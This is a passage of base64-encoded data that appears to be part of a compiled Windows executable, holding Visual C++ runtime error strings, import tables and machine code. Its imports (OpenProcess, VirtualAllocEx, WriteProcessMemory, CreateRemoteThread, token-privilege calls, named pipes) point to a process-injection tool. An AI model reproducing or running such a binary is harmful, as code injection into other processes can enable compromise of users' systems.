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 +dRT/dRDongEAAFlZiUUUoYB9QACD+AJ1Hf91HP91GP91FP91EP91DP91CP8V5GBAAOneAAAAg/gB +D4XTAAAAOX0gdQiheH1AAIlFIFdX/3UU/3UQi0Uk99gbwIPgCEBQ/3Ug/xXEYEAAi9iJXeQ73w+E +nAAAAIl9/I0EG4PAAyT86M/+//+JZeiLxIlF3INN/P/rE2oBWMOLZegz/4l93INN/P+LXeQ5fdx0 +ZlP/ddz/dRT/dRBqAf91IP8VxGBAAIXAdE1XV1P/ddz/dQz/dQj/FehgQACL8Il12Dv3dDL2RQ0E +dEA5fRwPhLIAAAA7dRx/Hv91HP91GFP/ddz/dQz/dQj/FehgQACFwA+FjwAAADPAjWXIi03wZIkN +AAAAAF9eW8nDx0X8AQAAAI0ENoPAAyT86Bv+//+JZeiL3Ild4INN/P/rEmoBWMOLZegz/zPbg038 +/4t12DvfdLRWU/915P913P91DP91CP8V6GBAAIXAdJw5fRxXV3UEV1frBv91HP91GFZTaCACAAD/ +dSD/FaxgQACL8Dv3D4Rx////i8bpbP///4tUJAiLRCQEhdJWjUr/dA2AOAB0CECL8UmF9nXzgDgA +XnUFK0QkBMOLwsP/JbhgqGcAAJBnAAB4ZwAAAAAAABRmAABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAA +JGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcAAEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADW +ZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAAQGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5o +AADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABSaQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkA +ANRpAADgaQAA8GkAAABqAAAAAAAA/////wcdQAAbHUAABgAABgABAAAQAAMGAAYCEARFRUUFBQUF +BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI +AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM +T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu +YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv +ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y +IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u +IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh +YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx +OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp +dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl +YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v +dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj +ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA +AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy +cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAAAAAAA//// +/+tMQADvTEAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEA +dXNlcjMyLmRsbAAA/////79WQADDVkAA/////3NXQAB3V0AAFGUAAAAAAAAAAAAAamcAABBgAAAE +ZQAAAAAAAAAAAAC8ZwAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRm +AABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAAJGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcA +AEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADWZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAA +QGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5oAADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABS +aQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkAANRpAADgaQAA8GkAAABqAAAAAAAAwwBGcmVl +TGlicmFyeQBTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAA/QJXYWl0Rm9yU2luZ2xl +T2JqZWN0AE0AQ3JlYXRlVGhyZWFkAAA0AENyZWF0ZUV2ZW50QQAALQFHZXRMYXN0RXJyb3IAABEC +T3BlblByb2Nlc3MAHgBDbG9zZUhhbmRsZQAJAUdldEN1cnJlbnRQcm9jZXNzAPICVmlydHVhbEZy +ZWVFeABJAENyZWF0ZVJlbW90ZVRocmVhZAAAFwNXcml0ZVByb2Nlc3NNZW1vcnkAAO8CVmlydHVh +bEFsbG9jRXgAAAoBR2V0Q3VycmVudFByb2Nlc3NJZAA4AUdldE1vZHVsZUZpbGVOYW1lQQAAZQBE +aXNjb25uZWN0TmFtZWRQaXBlAD0CUmVhZEZpbGUAACYAQ29ubmVjdE5hbWVkUGlwZQAAkAJTZXRF +dmVudAAARABDcmVhdGVOYW1lZFBpcGVBAABLRVJORUwzMi5kbGwAABkAQWRqdXN0VG9rZW5Qcml2 +aWxlZ2VzABgBTG9va3VwUHJpdmlsZWdlVmFsdWVBAGcBT3BlblByb2Nlc3NUb2tlbgAAQURWQVBJ +MzIuZGxsAAC6AUhlYXBGcmVlAAC9AUhlYXBSZUFsbG9jALQBSGVhcEFsbG9jAIwARXhpdFByb2Nl 